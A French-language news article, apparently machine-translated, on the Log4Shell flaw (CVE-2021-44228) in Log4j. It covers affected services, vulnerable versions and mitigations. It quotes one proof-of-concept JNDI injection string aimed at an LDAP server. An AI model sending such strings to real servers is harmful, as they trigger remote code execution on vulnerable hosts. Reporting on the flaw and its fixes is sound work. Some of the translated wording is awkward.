AccueilSécuritéUne faille critique "zero-day" dans Log4j met en danger de nombreux serveurs...

Une faille critique « zero-day » dans Log4j met en danger de nombreux serveurs et apps

Une vulnérabilité critique du jour zéro appelée Log4Shell dans la bibliothèque d’enregistrement Java Log4j largement utilisée permet aux attaquants d’exécuter du code arbitraire. Les services d’Apple, Twitter, Steam, Amazon et probablement de nombreuses offres plus petites sont concernés. Il existe un code de preuve de concept qui démontre l’exploitation de la faille et déjà les premières attaques. Une mise à jour du code source du projet Apache est disponible depuis peu ; les administrateurs doivent agir de toute urgence.

Un attaquant peut exploiter la faille de sécurité en envoyant des requêtes manipulées à un serveur ou une application vulnérable. Le code de preuve de concept (PoC) du groupe de test de stylo 0x0021h montre que l’attaquant peut envoyer une chaîne de caractères de la forme ${jndi:ldap://127.0.0.1:1389/a} est écrite dans le journal. Le service d’annuaire JNDI contacte ledit serveur LDAP 127.0.0.1:1389 et reçoit finalement de lui des données telles que des classes Java potentiellement malveillantes et les exécute. Un attaquant devrait donc indiquer un serveur qu’il contrôle pour détourner un serveur via la journalisation (Log4Shell).

Sommaire

La faille zero-day Log4Shell a déjà reçu un numéro CVE (CVE-2021-44228, risque critique, CVSSv3 10/10). Il ouvre des failles de sécurité dans de nombreux services et applications qui utilisent la bibliothèque Log4j. Le groupe de test 0x0021h écrit à propos de son exploit PoC qu’il fonctionne pour Apache Struts2, Apache Solr, Apache Druid, Apache Flink et d’autres.

Un autre utilisateur rassemble dans un projet github les services et programmes vulnérables avec des captures d’écran à l’appui. Parmi eux, on trouve de nombreux noms connus comme Amazon, Apple iCloud, Cloudflare, Steam ou Twitter. Parmi les applications, on trouve notamment celles mentionnées par 0x0021h ainsi que le très populaire Minecraft. Divers chercheurs en sécurité font état de scans à la recherche de services vulnérables et le CERT de Deutsche Telekom, entre autres, observe déjà les premières attaques.

Log4j, de la version 2.0-beta9 à la version 2.14.1, est concerné par cette faille de sécurité. Le projet Apache a publié à court terme la version 2.15.0, qui comble la faille. Dans un message de sécurité, les développeurs d’Apache énumèrent en outre des mesures permettant de sécuriser provisoirement les serveurs sans mise à jour. Chez Log4j à partir de la version 2.10, l’activation de la propriété système  »  » aide.log4j2.formatMsgNoLookups » à « true » ou la suppression de la JndiLookup-du classpath (par exemple avec la commande zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class). En outre, Java 8u121 empêcherait l’exécution de code introduit, de sorte qu’une mise à jour de l’environnement Java pourrait aider.

Les distributions Linux et les projets basés sur Apache devraient donc prochainement fournir des paquets mis à jour que les administrateurs devraient installer le plus rapidement possible.

Cette faille rappelle ShellShock : à l’époque, de nombreux serveurs avaient pu être compromis par une faille de sécurité dans l’interpréteur de ligne de commande Bash. Certains y avaient même vu un potentiel de ver, c’est-à-dire que le code malveillant pouvait « ramper » automatiquement de serveur en serveur.

Plus d'articles